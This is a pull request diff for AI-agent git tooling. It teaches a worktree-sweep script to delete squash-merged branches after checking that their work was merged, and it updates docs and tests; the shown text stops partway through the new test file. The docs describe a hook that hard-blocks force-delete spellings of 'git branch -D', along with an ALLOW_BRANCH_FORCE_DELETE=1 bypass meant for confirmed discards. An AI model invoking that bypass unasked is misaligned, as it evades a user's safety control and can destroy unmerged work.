### PR TITLE
#907: give worktree teardown a permitted path to delete a squash-merged branch

### DIFF
--- a/.github/workflows/test.yml
+++ b/.github/workflows/test.yml
@@ -56,7 +56,7 @@ jobs:
           # assumption). Stage it before running.
           mkdir -p "$HOME/.claude/lib"
           cp modules/hooks/lib/*.py "$HOME/.claude/lib/"
-          for t in modules/hooks/tests/*.sh modules/branch-guard/tests/*.sh modules/ask-context/tests/*.sh; do
+          for t in modules/hooks/tests/*.sh modules/branch-guard/tests/*.sh modules/ask-context/tests/*.sh modules/git-worktrees/tests/*.sh; do
             echo "=== Running $t ==="
             bash "$t"
           done
@@ -142,7 +142,7 @@ jobs:
           # assumption). Stage it before running.
           mkdir -p "$HOME/.claude/lib"
           cp modules/hooks/lib/*.py "$HOME/.claude/lib/"
-          for t in modules/hooks/tests/*.sh modules/branch-guard/tests/*.sh modules/ask-context/tests/*.sh; do
+          for t in modules/hooks/tests/*.sh modules/branch-guard/tests/*.sh modules/ask-context/tests/*.sh modules/git-worktrees/tests/*.sh; do
             echo "=== Running $t ==="
             bash "$t"
           done

--- a/modules/autoheal/commands/autoheal-apply.md
+++ b/modules/autoheal/commands/autoheal-apply.md
@@ -83,7 +83,10 @@ identical to `/permission-fix apply <id>` and the opt-in
    via `git apply`.
 6. Run `tests/test-modules.sh` and `tests/test-no-personal-data.sh`.
    If either fails: revert the branch (`git checkout main`,
-   `git branch -D autoheal/{id}`), surface the failure, exit non-zero.
+   `ALLOW_BRANCH_FORCE_DELETE=1 git branch -D autoheal/{id}`), surface the
+   failure, exit non-zero. The hatch is required because force-deleting a
+   branch is hard-blocked by default; discarding this just-created,
+   test-failing branch is exactly the intentional case it exists for.
 7. If tests pass: commit with message
    `#auto: apply autoheal proposal {proposal-id}`. The `#auto:`
    prefix is recognized by `enforce-git-workflow.py` as a non-issue

--- a/modules/git-worktrees/README.md
+++ b/modules/git-worktrees/README.md
@@ -11,7 +11,7 @@ Key capabilities:
 - **Default parallel-delegation isolation**: one ephemeral worktree per unit of work, sharing the parent `.git`.
 - **`/worktree-start`**: create a worktree hands-on, with gitignore verification and project-setup auto-detection.
 - **`/worktree-finish`**: finish one worktree via a four-option gate (merge locally / push + PR / keep / discard).
-- **`/worktree-sweep`**: repo-wide safe janitor — remove clean worktrees, preserve anything with unsaved work, prune stale metadata. The enforced-teardown backstop.
+- **`/worktree-sweep`**: repo-wide safe janitor — remove clean worktrees, preserve anything with unsaved work, prune stale metadata, and delete each removed worktree's branch once the default branch provably contains its work. The enforced-teardown backstop, and the only permitted way to delete a squash-merged branch.
 
 ## Why It Exists
 
@@ -38,7 +38,7 @@ Worktrees share `.git` objects and external caches, but **each still builds its 
 | `commands/worktree-start.md` | command | `/worktree-start {branch-name}` |
 | `commands/worktree-finish.md` | command | `/worktree-finish` — four-option gate for one worktree |
 | `commands/worktree-sweep.md` | command | `/worktree-sweep` — safe repo-wide orphan janitor |
-| `lib/worktree-sweep.sh` | lib | Deterministic sweep implementation (classify → non-force remove → prune → report) |
+| `lib/worktree-sweep.sh` | lib | Deterministic sweep implementation (classify → non-force remove → prune → verified branch delete → report) |
 
 ## Dependencies
 

--- a/modules/git-worktrees/commands/worktree-finish.md
+++ b/modules/git-worktrees/commands/worktree-finish.md
@@ -78,8 +78,7 @@ Do NOT pick an option on the user's behalf. If the reply is not `1`, `2`, `3`, o
 5. Show the staged diff. Ask the user to confirm the squash commit message.
 6. `git commit -m "<message>"`
 7. Push: ask first. If confirmed, `git push origin main`.
-8. Remove the worktree: `git worktree remove <path>`
-9. Delete the branch: `git branch -D <branch>` (safe after squash merge).
+8. Tear down the worktree and its branch in one step: `bash ~/.claude/lib/worktree-sweep.sh --worktree <path>`. This removes the worktree, prunes the metadata, and deletes the branch after verifying the squash merge absorbed it. Do **not** hand-roll `git branch -D` — it is denied and hard-blocked, and chaining it onto `git worktree remove` kills the removal too (issue #907).
 
 #### Option 2: Push and Open PR
 
@@ -115,7 +114,7 @@ Branch: <branch>
 3. If the typed reply does not match the branch name exactly, abort and report: "Discard cancelled - typed name did not match."
 4. If it matches:
    - `git worktree remove --force <path>`
-   - `git branch -D <branch>`
+   - `ALLOW_BRANCH_FORCE_DELETE=1 git branch -D <branch>` — discard is the one case where throwing commits away is the point, so it uses the escape hatch rather than the sweep (which by design refuses to delete an unmerged branch). The typed confirmation in step 2 is what authorizes it.
    - If the branch was pushed, ask separately whether to delete the remote: `git push origin --delete <branch>`. This is a second typed confirmation.
 5. Report: worktree and branch discarded.
 

--- a/modules/git-worktrees/commands/worktree-sweep.md
+++ b/modules/git-worktrees/commands/worktree-sweep.md
@@ -13,12 +13,27 @@ It exists because the harness's `isolation: "worktree"` auto-removes a worktree 
 
 ```
 /worktree-sweep [--dry-run] [--conservative] [--all]
+                [--worktree <path>] [--keep-branches] [--merged-branches]
 ```
 
-- **(no flags)** — report + remove every clean worktree in the managed locations. Safe by construction: a clean worktree's commits survive on its branch ref after removal (only the checkout and its build artifacts go), so nothing committed is ever lost.
-- **`--dry-run`** — classify and show what *would* happen; remove nothing. Run this first if you want a preview.
+- **(no flags)** — report + remove every clean worktree in the managed locations, and delete each removed worktree's branch if the default branch already contains its work. Safe by construction: a clean worktree's commits survive on its branch ref after removal, and a branch is only deleted once those commits are reachable from the default branch anyway.
+- **`--dry-run`** — classify and show what *would* happen; change nothing. Run this first if you want a preview.
 - **`--conservative`** — additionally preserve clean worktrees whose branch has commits not yet on the origin default branch (keep in-progress-but-committed checkouts around). Removes only fully-merged, detached, or behind worktrees.
 - **`--all`** — also sweep clean worktrees outside the two managed locations (`.claude/worktrees/`, `.worktrees/`). Off by default so a deliberately-placed worktree elsewhere is never touched.
+- **`--worktree <path>`** — scope the whole sweep to one worktree. This is the per-unit teardown of lifecycle step 4: remove it, prune, delete its branch if absorbed. Refuses a path that is not a worktree of this repo, and refuses the main checkout.
+- **`--keep-branches`** — never delete branches; only remove worktrees.
+- **`--merged-branches`** — also delete local branches that have no worktree at all and whose work the default branch already contains. This is the recovery path when a worktree was removed by hand earlier and left its branch behind.
+
+## Branch Cleanup
+
+The sweep deletes a branch only after verifying the default branch already contains its work, two ways:
+
+- the branch is an **ancestor** of the default branch (a normal merge), or
+- replaying the branch's **tree** on the merge base is patch-equivalent to something already upstream (a **squash merge**).
+
+The second test is what makes this useful. This repo family squash-merges, and a squash merge rewrites the branch's commits — so `git branch -d` refuses the branch as "not fully merged", and `git branch -D` is denied. Without this verification step there is no permitted way to finish a teardown after a squash merge, which is how worktrees kept getting stranded on disk (issue #907).
+
+A branch that passes neither test is **kept**, and the report says so and prints the `git worktree add` line that restores its checkout. Nothing unmerged is ever discarded.
 
 ## What It Does
 
@@ -40,13 +55,13 @@ The script classifies each worktree (never the main checkout, never the one you 
 | Locked | **PRESERVE** (report; run `git worktree unlock` if intended) |
 | Clean, in a managed location | **REMOVE** (non-force) |
 | Clean, outside managed locations | **SKIP** (unless `--all`) |
-| Directory already gone (prunable) | **PRUNE** metadata |
+| Directory already gone (prunable) | **PRUNE** metadata, then clean up its leftover branch |
 
 It **never uses `--force`.** A non-force `git worktree remove` is itself a safety gate — git refuses on any modified-or-untracked worktree — so even if the classification missed something, git will not let the sweep destroy unsaved work. A gitignored build artifact (`.build/`, `target/`) does not block a clean removal.
 
 ## After the Sweep
 
-Report the summary the script prints: how many worktrees were removed (and disk reclaimed), how many were preserved and why, and how many prunable entries were cleaned. For any removed worktree whose branch had commits not on the default branch, the report includes the exact `git worktree add ...` command to restore the checkout — the branch and its commits were never deleted.
+Report the summary the script prints: how many worktrees were removed (and disk reclaimed), how many were preserved and why, how many branches were deleted, and how many prunable entries were cleaned. For any removed worktree whose branch had commits not on the default branch, the report includes the exact `git worktree add ...` command to restore the checkout — that branch and its commits were never deleted.
 
 ## Related
 

--- a/modules/git-worktrees/lib/worktree-sweep.sh
+++ b/modules/git-worktrees/lib/worktree-sweep.sh
@@ -20,28 +20,58 @@
 # (legacy module location), plus prunable entries whose directory is already
 # gone. Worktrees elsewhere are reported but left alone unless --all is given.
 #
-# Usage: worktree-sweep.sh [--dry-run|-n] [--conservative] [--all] [-h|--help]
-#   --dry-run       Report the classification and planned actions; remove nothing.
-#   --conservative  Also PRESERVE clean worktrees whose branch has commits not on
-#                   the origin default branch (keep in-progress-but-committed
-#                   checkouts around). Default removes clean worktrees regardless,
-#                   since their commits survive on the branch ref.
-#   --all           Also sweep clean worktrees outside the two managed locations.
-#   -h, --help      Print this header.
+# BRANCH CLEANUP: after removing a worktree, its branch is deleted IFF the default
+# branch already contains the branch's work - either a normal merge (the branch is
+# an ancestor) or a SQUASH merge (the branch's tree, replayed on the merge base,
+# is patch-equivalent to something already upstream). A branch that fails both
+# tests is kept and reported, so no unmerged commit is ever discarded. This is the
+# permitted path that `git branch -D` is not: agents cannot run `git branch -D`
+# (it is denied, and hard-blocked by auto-approve-bash.py), and `git branch -d`
+# refuses squash-merged branches, so without this there is no way to finish a
+# teardown after a squash merge (GitHub issue #907).
+#
+# Usage: worktree-sweep.sh [--dry-run|-n] [--conservative] [--all]
+#                          [--worktree <path>] [--keep-branches] [--merged-branches]
+#                          [-h|--help]
+#   --dry-run          Report the classification and planned actions; change nothing.
+#   --conservative     Also PRESERVE clean worktrees whose branch has commits not on
+#                      the origin default branch (keep in-progress-but-committed
+#                      checkouts around). Default removes clean worktrees regardless,
+#                      since their commits survive on the branch ref.
+#   --all              Also sweep clean worktrees outside the two managed locations.
+#   --worktree <path>  Scope the sweep to ONE worktree - the per-unit teardown for
+#                      lifecycle step 4. Implies --all for that path.
+#   --keep-branches    Never delete branches; only remove worktrees (pre-#907 behavior).
+#   --merged-branches  Also delete local branches with no worktree at all whose work
+#                      the default branch already contains. Recovers the leftover
+#                      branch when a worktree was removed by hand earlier.
+#   -h, --help         Print this header.
 set -u
 
 MODE="apply"
 CONSERVATIVE=0
 ALL=0
+KEEP_BRANCHES=0
+MERGED_BRANCHES=0
+ONLY_WORKTREE=""
 
-for arg in "$@"; do
-  case "$arg" in
+while [ $# -gt 0 ]; do
+  case "$1" in
     --dry-run|-n) MODE="dry-run" ;;
     --conservative) CONSERVATIVE=1 ;;
     --all) ALL=1 ;;
+    --keep-branches) KEEP_BRANCHES=1 ;;
+    --merged-branches) MERGED_BRANCHES=1 ;;
+    --worktree)
+      shift
+      [ $# -gt 0 ] || { echo "worktree-sweep: --worktree needs a path" >&2; exit 2; }
+      ONLY_WORKTREE="$1"; ALL=1 ;;
+    --worktree=*)
+      ONLY_WORKTREE="${1#--worktree=}"; ALL=1 ;;
     -h|--help) grep '^#' "$0" | sed 's/^# \{0,1\}//'; exit 0 ;;
-    *) echo "worktree-sweep: unknown arg: $arg" >&2; exit 2 ;;
+    *) echo "worktree-sweep: unknown arg: $1" >&2; exit 2 ;;
   esac
+  shift
 done
 
 if ! git rev-parse --show-toplevel >/dev/null 2>&1; then
@@ -80,12 +110,103 @@ if [ -n "$_common_dir" ] && [ "$(git rev-parse --is-bare-repository 2>/dev/null)
   MAIN_CHECKOUT="$(cd "$_common_dir/.." 2>/dev/null && pwd -P)"
 fi
 
+# Short name of the default branch, so it is never a deletion candidate.
+DEFAULT_BRANCH="${DEFAULT_REF#origin/}"
+
+# Resolve --worktree to the same canonical form git reports, so the comparison
+# in process_record holds (pwd -P collapses macOS /var -> /private/var).
+if [ -n "$ONLY_WORKTREE" ]; then
+  _resolved="$(cd "$ONLY_WORKTREE" 2>/dev/null && pwd -P)"
+  if [ -z "$_resolved" ]; then
+    echo "worktree-sweep: --worktree path does not exist: $ONLY_WORKTREE" >&2
+    exit 2
+  fi
+  ONLY_WORKTREE="$_resolved"
+  if ! git worktree list --porcelain | grep -qxF "worktree $ONLY_WORKTREE"; then
+    echo "worktree-sweep: not a worktree of this repository: $ONLY_WORKTREE" >&2
+    exit 2
+  fi
+  # The main checkout is listed like any other worktree but can never be torn
+  # down. Refuse loudly rather than exiting 0 having done nothing.
+  if [ -n "$MAIN_CHECKOUT" ] && [ "$ONLY_WORKTREE" = "$MAIN_CHECKOUT" ]; then
+    echo "worktree-sweep: refusing to sweep the main checkout: $ONLY_WORKTREE" >&2
+    exit 2
+  fi
+fi
+
 is_managed() {
   # True if the path lives under a managed worktree dir.
   case "$1" in
     */.claude/worktrees/*|*/.worktrees/*) return 0 ;;
     *) return 1 ;;
   esac
+}
+
+branch_is_absorbed() {
+  # True if the default branch already contains this branch's work, by EITHER
+  # a normal merge or a squash merge. False on any error, so an unverifiable
+  # branch is always kept.
+  #
+  # Squash detection: a squash merge rewrites the branch's commits into one new
+  # commit, so the originals are not ancestors and their patch-ids do not match.
+  # Replaying the branch's TREE as a single synthetic commit on the merge base
+  # reproduces exactly what the squash produced, and `git cherry` then reports
+  # it as already upstream ("-"). GIT_* identity is set explicitly because
+  # `git commit-tree` fails with "empty ident name not allowed" on a machine or
+  # CI runner with no configured git identity.
+  local b="$1" base tree syn
+  [ -n "$DEFAULT_REF" ] || return 1
+  [ "$b" != "$DEFAULT_BRANCH" ] || return 1
+  git show-ref --verify --quiet "refs/heads/$b" 2>/dev/null || return 1
+  git merge-base --is-ancestor "refs/heads/$b" "$DEFAULT_REF" 2>/dev/null && return 0
+  base="$(git merge-base "$DEFAULT_REF" "refs/heads/$b" 2>/dev/null)" || return 1
+  [ -n "$base" ] || return 1
+  tree="$(git rev-parse "refs/heads/$b^{tree}" 2>/dev/null)" || return 1
+  syn="$(GIT_AUTHOR_NAME=worktree-sweep GIT_AUTHOR_EMAIL=worktree-sweep@localhost \
+         GIT_COMMITTER_NAME=worktree-sweep GIT_COMMITTER_EMAIL=worktree-sweep@localhost \
+         git commit-tree "$tree" -p "$base" -m _ 2>/dev/null)" || return 1
+  [ -n "$syn" ] || return 1
+  case "$(git cherry "$DEFAULT_REF" "$syn" 2>/dev/null)" in
+    "-"*) return 0 ;;
+  esac
+  return 1
+}
+
+BRANCHES_DELETED=0
+BRANCH_NOTE=""
+BRANCH_LINES=""
+
+# Snapshot the worktree table BEFORE pruning, so already-gone entries are still
+# in it and their leftover branches can be cleaned. Then drop the stale metadata:
+# git refuses to delete a branch a registered worktree still claims, so the claim
+# has to go first. Pruning only ever touches entries whose directory is gone.
+WT_LIST="$(git worktree list --porcelain)"
+[ "$MODE" = "apply" ] && git worktree prune 2>/dev/null
+
+cleanup_branch() {
+  # Delete $1 if absorbed, else keep it. Sets BRANCH_NOTE to a report suffix.
+  # Deliberately assigns a global instead of printing: a $(...) call site would
+  # run this in a subshell and lose the BRANCHES_DELETED increment.
+  local b="$1"
+  BRANCH_NOTE=""
+  [ -n "$b" ] || return 0
+  if [ "$KEEP_BRANCHES" = "1" ]; then
+    BRANCH_NOTE=" (branch $b kept: --keep-branches)"; return 0
+  fi
+  if ! branch_is_absorbed "$b"; then
+    BRANCH_NOTE=" (branch $b KEPT: work not on ${DEFAULT_REF:-<unknown default>} - nothing discarded)"
+    return 0
+  fi
+  if [ "$MODE" = "dry-run" ]; then
+    BRANCH_NOTE=" (branch $b WOULD BE DELETED: already on $DEFAULT_REF)"
+    BRANCHES_DELETED=$((BRANCHES_DELETED+1)); return 0
+  fi
+  if git branch -D "$b" >/dev/null 2>&1; then
+    BRANCH_NOTE=" (branch $b deleted: already on $DEFAULT_REF)"
+    BRANCHES_DELETED=$((BRANCHES_DELETED+1))
+  else
+    BRANCH_NOTE=" (branch $b kept: git refused the delete)"
+  fi
 }
 
 in_progress_op() {
@@ -120,13 +241,21 @@ process_record() {
   [ -z "$CUR_PATH" ] && return 0
   [ "$CUR_BARE" = "1" ] && return 0                                  # the bare repo itself is not a checkout
   if [ -n "$MAIN_CHECKOUT" ] && [ "$CUR_PATH" = "$MAIN_CHECKOUT" ]; then return 0; fi   # main checkout
+  # --worktree scopes the whole sweep to one unit of work.
+  if [ -n "$ONLY_WORKTREE" ] && [ "$CUR_PATH" != "$ONLY_WORKTREE" ]; then return 0; fi
   local path="$CUR_PATH"
   local label="$path"
   if [ "$CUR_DETACHED" = "1" ]; then label="$label  (detached)"; else label="$label  [$CUR_BRANCH]"; fi
 
-  # Already-gone directory: git prunable will drop the metadata.
+  # Already-gone directory: git prunable will drop the metadata. Its branch is
+  # still a teardown leftover, so it gets the same verified cleanup.
   if [ "$CUR_PRUNABLE" = "1" ] || [ ! -d "$path" ]; then
-    PRUNABLE=$((PRUNABLE+1)); return 0
+    PRUNABLE=$((PRUNABLE+1))
+    if [ "$CUR_DETACHED" != "1" ] && [ -n "$CUR_BRANCH" ]; then
+      cleanup_branch "$CUR_BRANCH"
+      [ -n "$BRANCH_NOTE" ] && BRANCH_LINES="${BRANCH_LINES}  - ${CUR_BRANCH} (worktree already gone)${BRANCH_NOTE}"$'\n'
+    fi
+    return 0
   fi
   # Never touch the worktree we are standing in.
   if [ "$path" = "$CWD_WT" ]; then
@@ -174,19 +303,36 @@ process_record() {
   fi
 
   local kb; kb="$(du -sk "$path" 2>/dev/null | awk '{print $1}')"; [ -z "$kb" ] && kb=0
-  local note=""
-  [ -n "$unmerged" ] && note=" (branch kept: $unmerged commit(s) not on $DEFAULT_REF; restore with 'git worktree add $path $CUR_BRANCH')"
   if [ "$MODE" = "dry-run" ]; then
-    REMOVED_LINES="${REMOVED_LINES}  - $label -> WOULD REMOVE, ~$((kb/1024)) MB$note"$'\n'
+    branch_note_for "$path"
+    REMOVED_LINES="${REMOVED_LINES}  - $label -> WOULD REMOVE, ~$((kb/1024)) MB${BRANCH_NOTE}"$'\n'
     REMOVED=$((REMOVED+1)); RECLAIMED_KB=$((RECLAIMED_KB+kb)); return 0
   fi
   if git worktree remove "$path" 2>/dev/null; then
-    REMOVED_LINES="${REMOVED_LINES}  - $label -> removed, ~$((kb/1024)) MB$note"$'\n'
+    # Branch cleanup runs only AFTER the checkout is gone: git refuses to delete
+    # a branch that a live worktree has checked out.
+    branch_note_for "$path"
+    REMOVED_LINES="${REMOVED_LINES}  - $label -> removed, ~$((kb/1024)) MB${BRANCH_NOTE}"$'\n'
     REMOVED=$((REMOVED+1)); RECLAIMED_KB=$((RECLAIMED_KB+kb))
   else
     # Non-force refused: git found something unsafe the checks missed. Never force.
     declare_preserved "  - $label -> PRESERVE (git refused non-force removal)"
   fi
+}
+
+branch_note_for() {
+  # Resolve the branch decision for the record being processed, appending the
+  # restore hint whenever the branch survives. $1 is the worktree path (for the
+  # hint only).
+  BRANCH_NOTE=""
+  [ "$CUR_DETACHED" = "1" ] && return 0        # detached: no branch to clean up
+  [ -n "$CUR_BRANCH" ] || return 0
+  cleanup_branch "$CUR_BRANCH"
+  case "$BRANCH_NOTE" in
+    *"deleted:"*|*"WOULD BE DELETED"*) ;;
+    "") ;;
+    *) BRANCH_NOTE="${BRANCH_NOTE%)}; restore with 'git worktree add $1 $CUR_BRANCH')" ;;
+  esac
 }
 
 while IFS= read -r line || [ -n "$line" ]; do
@@ -199,9 +345,33 @@ while IFS= read -r line || [ -n "$line" ]; do
     "bare")       CUR_BARE=1 ;;   # the bare repo entry has no checkout; skip it
   esac
 done <<EOF
-$(git worktree list --porcelain)
+${WT_LIST}
 EOF
 process_record   # flush the final record
+
+# --merged-branches: leftover branches with no worktree at all. This is the
+# recovery path when a worktree was removed by hand earlier, leaving a branch
+# `git branch -d` will not delete because the PR was squash-merged. Only
+# branches the default branch already contains are touched, and never one that
+# is checked out anywhere.
+if [ "$MERGED_BRANCHES" = "1" ] && [ "$KEEP_BRANCHES" != "1" ] && [ -n "$DEFAULT_REF" ]; then
+  CHECKED_OUT="$(git worktree list --porcelain | sed -n 's/^branch refs\/heads\///p')"
+  while IFS= read -r b; do
+    [ -n "$b" ] || continue
+    [ "$b" = "$DEFAULT_BRANCH" ] && continue
+    printf '%s\n' "$CHECKED_OUT" | grep -qxF "$b" && continue
+    branch_is_absorbed "$b" || continue
+    if [ "$MODE" = "dry-run" ]; then
+      BRANCH_LINES="${BRANCH_LINES}  - $b (no worktree) WOULD BE DELETED: already on $DEFAULT_REF"$'\n'
+      BRANCHES_DELETED=$((BRANCHES_DELETED+1))
+    elif git branch -D "$b" >/dev/null 2>&1; then
+      BRANCH_LINES="${BRANCH_LINES}  - $b (no worktree) deleted: already on $DEFAULT_REF"$'\n'
+      BRANCHES_DELETED=$((BRANCHES_DELETED+1))
+    fi
+  done <<EOF
+$(git for-each-ref --format='%(refname:short)' refs/heads)
+EOF
+fi
 
 # Drop administrative state for worktrees whose directories are gone or removed.
 if [ "$MODE" = "dry-run" ]; then
@@ -227,5 +397,10 @@ if [ "$SKIPPED" -gt 0 ]; then
   printf "%s" "$SKIPPED_LINES"
   echo ""
 fi
+if [ -n "$BRANCH_LINES" ]; then
+  echo "BRANCHES (no live worktree):"
+  printf "%s" "$BRANCH_LINES"
+  echo ""
+fi
 [ "$PRUNABLE" -gt 0 ] && echo "PRUNED $PRUNABLE worktree(s) whose directory was already gone."
-echo "Done. $REMOVED removed, $PRESERVED preserved, $SKIPPED skipped."
+echo "Done. $REMOVED removed, $PRESERVED preserved, $SKIPPED skipped, $BRANCHES_DELETED branch(es) deleted."

--- a/modules/git-worktrees/rules/git-worktrees.md
+++ b/modules/git-worktrees/rules/git-worktrees.md
@@ -41,7 +41,13 @@ A worktree is created for **exactly one unit of work** and has one owner — the
 1. **Create** — the delegator makes one worktree per unit (via the Agent/Workflow `isolation: "worktree"`, or `/worktree-start` for hands-on work). One branch, one unit.
 2. **Implement / test / PR** — the sub-agent does the work inside its worktree, on its feature branch, and opens a PR.
 3. **Merge** — the PR is reviewed and merged.
-4. **Remove** — **the delegator removes that unit's worktree as soon as its PR merges** (or the unit is abandoned). This step is mandatory, not "when I get around to it." See Cleanup below.
+4. **Remove** — **the delegator tears that unit down as soon as its PR merges** (or the unit is abandoned). One command does the whole step — remove the worktree, prune the metadata, and delete the branch if the merge already absorbed it:
+
+   ```bash
+   bash ~/.claude/lib/worktree-sweep.sh --worktree .claude/worktrees/<name>
+   ```
+
+   This step is mandatory, not "when I get around to it." See Cleanup below.
 5. **Sweep orphans** — as a backstop, run `/worktree-sweep` to remove any clean worktree that leaked past step 4 (an early exit, a crash, a `isolation:"worktree"` worktree the harness could not auto-remove because it was built in).
 
 Steps 4 and 5 are the half of the fix that the incident was missing. A delegator that spawns worktrees and does not tear them down has not finished the job.
@@ -78,7 +84,15 @@ This is the whole lesson of the incident: **cleanup must not depend on the happy
 - **On any abnormal exit** (early stop, gate rejection, crash, a `isolation:"worktree"` worktree the harness could not reclaim), the worktree leaks. So a **standalone safe sweep must be runnable at any time** to reclaim orphans: `/worktree-sweep`.
 - **For unattended runs**, schedule the sweep as a backstop so cleanup happens even if no one remembers (see "Scheduled backstop" below). This mirrors the principle that *safety must not depend on a report being read*: the disk is reclaimed whether or not the operator notices.
 
-Removing a single worktree by hand:
+Tearing down a single worktree — **use the janitor, not hand-rolled git**:
+
+```bash
+bash ~/.claude/lib/worktree-sweep.sh --worktree .claude/worktrees/<branch-name>
+```
+
+It removes the worktree (non-force, so git still refuses on unsaved work), prunes the metadata, and deletes the branch **only if** the default branch already contains its work. Add `--dry-run` first if you want to see the classification before anything changes.
+
+The raw git equivalent is two commands, and both are on the allow list:
 
 ```bash
 git worktree remove .claude/worktrees/<branch-name>   # non-force; refuses if there is unsaved work
@@ -86,6 +100,25 @@ git worktree prune                                    # drop administrative stat
 ```
 
 Never `rm -rf` a worktree directory — it leaves dangling `.git/worktrees/<name>/` metadata. Always use `git worktree remove` (then `git worktree prune`).
+
+### Do Not Chain `git branch -D` Onto Teardown
+
+`git branch -D` is **denied**, and a chain is only as safe as its most dangerous link: a single `git branch -D` segment kills the whole command, including the `git worktree remove` in front of it. The denial names the entire command, so it reads as if worktree removal were blocked. It is not — both worktree commands are permitted; only the branch delete is at fault.
+
+This dead-end is why worktrees kept getting left on disk (issue #907): agents chained the branch delete onto teardown, got the whole chain denied, concluded teardown was impossible, and moved on. Measured across session transcripts: ~39 such denials in 26 sessions, spread over two months.
+
+The branch delete is denied because it can discard commits that exist nowhere else — and `git branch -d`, the safe form, is no way out either. **This repo family squash-merges**, and a squash merge rewrites the branch's commits, so the branch is not an ancestor of main and `git branch -d` refuses it with "not fully merged."
+
+`worktree-sweep.sh` is the way through. It verifies absorption two ways — the branch is an ancestor of the default branch (a normal merge), **or** replaying the branch's tree on the merge base is patch-equivalent to something already upstream (a squash merge) — and only then force-deletes. A branch that passes neither test is kept and reported, so nothing unmerged is ever discarded.
+
+| Situation | Command |
+|-----------|---------|
+| Worktree still present, PR merged | `bash ~/.claude/lib/worktree-sweep.sh --worktree <path>` |
+| Worktree already removed, branch left behind | `bash ~/.claude/lib/worktree-sweep.sh --merged-branches` |
+| Many worktrees to reclaim | `/worktree-sweep` |
+| Branch genuinely unmerged, discarding it on purpose | `ALLOW_BRANCH_FORCE_DELETE=1 git branch -D <branch>` |
+
+The last row is a deliberate statement that you are throwing commits away — not a way around the friction. A PreToolUse hook hard-blocks every force-delete spelling (`-D`, `-d -f`, `--delete --force`, `-Df`) and names the offending segment plus the command to run instead, so a chain that hits it tells you how to fix itself.
 
 ## Removal Safety (Codified From the Incident)
 
@@ -115,6 +148,8 @@ git worktree add .claude/worktrees/<branch-name> <branch-name>
 
 The one exception is a **detached-HEAD** worktree. It has no branch ref, so commits made on top of a detached checkout (e.g. `git worktree add <path> <sha>` then a fixup commit) are reachable from *nothing* once the checkout is gone — removing it orphans them (gc-eligible). So a clean detached worktree is safe to remove **only if** its HEAD is already reachable from some other ref (the common "parked at an existing commit" case); if it carries ref-orphan commits, preserve it.
 
+The sweep's branch cleanup does not weaken this. It deletes a branch only when the default branch already contains that branch's work, so every commit on the deleted ref is still reachable from the default branch. A branch with work of its own is kept, and the report prints the `git worktree add` line that restores its checkout.
+
 ### The four cases, decided
 
 | Worktree state | Outcome | Why |
@@ -124,6 +159,13 @@ The one exception is a **detached-HEAD** worktree. It has no branch ref, so comm
 | Mid-rebase with an unresolved conflict | **Preserve** | An in-progress operation; removal discards the resolution-in-progress |
 | Clean detached HEAD, reachable from a ref | **Remove** | The commit survives on that other ref; only the checkout goes |
 | Clean detached HEAD, commits on no ref | **Preserve** | No ref survives removal — the commits would be orphaned |
+
+Branch cleanup adds two more, decided the same way — by whether the work survives elsewhere:
+
+| Branch state after its worktree is removed | Outcome | Why |
+|--------------------------------------------|---------|-----|
+| Merged or squash-merged into the default branch | **Delete** | Every commit is already reachable from the default branch |
+| Anything else, including unverifiable | **Keep** | The work exists only on this ref; the report says so and prints the restore command |
 
 `/worktree-sweep` implements exactly this classification.
 

--- a/modules/git-worktrees/tests/test-worktree-sweep-branches.sh
+++ b/modules/git-worktrees/tests/test-worktree-sweep-branches.sh
@@ -1,0 +1,257 @@
+#!/usr/bin/env bash
+# Test suite for worktree-sweep.sh branch cleanup (GitHub issue #907).
+#
+# The loop this closes: this repo family squash-merges, so after a merge the
+# feature branch is not an ancestor of main and `git branch -d` refuses it. That
+# pushes agents to `git branch -D`, which is denied. The sweep is the permitted
+# path — it verifies the default branch already contains the work, then deletes.
+#
+# Covers:
+#   - A squash-merged branch is detected as absorbed and deleted (the core case).
+#   - A normally-merged branch is deleted.
+#   - An UNMERGED branch is kept, with the restore hint. Nothing is discarded.
+#   - --keep-branches restores the pre-#907 behavior.
+#   - --dry-run deletes nothing.
+#   - --worktree scopes the sweep to one unit and rejects a non-worktree path.
+#   - --merged-branches cleans a leftover branch whose worktree is already gone,
+#     never the default branch, never a branch checked out somewhere.
+#   - A dirty worktree is preserved and its branch is never touched.
+#
+# Run: bash modules/git-worktrees/tests/test-worktree-sweep-branches.sh
+# Exit 0 on success; non-zero if any assertion failed.
+
+set -u
+
+SCRIPT_DIR="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)"
+SWEEP="$(cd "${SCRIPT_DIR}/../lib" && pwd)/worktree-sweep.sh"
+
+PASS=0
+FAIL=0
+
+# Isolate from the user's git config: a global core.hooksPath would run this
+# machine's pre-commit hooks inside the fixtures, and a machine with no
+# configured identity would fail commit-tree with "empty ident name not allowed".
+export GIT_CONFIG_GLOBAL=/dev/null
+export GIT_CONFIG_SYSTEM=/dev/null
+export GIT_AUTHOR_NAME=test GIT_AUTHOR_EMAIL=test@localhost
+export GIT_COMMITTER_NAME=test GIT_COMMITTER_EMAIL=test@localhost
+
+assert_eq() {
+    local actual="$1" expected="$2" label="$3"
+    if [ "${actual}" = "${expected}" ]; then
+        PASS=$((PASS + 1))
+    else
+        FAIL=$((FAIL + 1))
+        echo "FAIL: ${label}"
+        echo "  expected: ${expected}"
+        echo "  actual:   ${actual}"
+    fi
+}
+
+assert_contains() {
+    local haystack="$1" needle="$2" label="$3"
+    case "${haystack}" in
+        *"${needle}"*) PASS=$((PASS + 1)) ;;
+        *)
+            FAIL=$((FAIL + 1))
+            echo "FAIL: ${label}"
+            echo "  expected substring: ${needle}"
+            echo "  actual: ${haystack}"
+            ;;
+    esac
+}
+
+TMPROOT="$(mktemp -d -t wtsweep.XXXXXX)"
+trap 'rm -rf "${TMPROOT}"' EXIT
+
+# Builds a repo with an origin, so DEFAULT_REF resolves to origin/main exactly
+# as it does in a real clone. Echoes the working-clone path.
+new_repo() {
+    local name="$1" root="${TMPROOT}/$1"
+    mkdir -p "${root}"
+    git init -q --bare "${root}/origin.git" -b main
+    git clone -q "${root}/origin.git" "${root}/work" 2>/dev/null
+    (
+        cd "${root}/work"
+        echo seed > seed.txt
+        git add . && git commit -qm init && git push -q origin main
+    )
+    echo "${root}/work"
+}
+
+# Creates branch $2 with a commit, checked out in a worktree under
+# .claude/worktrees/$2, in repo $1.
+add_worktree_branch() {
+    local repo="$1" branch="$2"
+    git -C "${repo}" worktree add -q -b "${branch}" ".claude/worktrees/${branch}" main
+    (
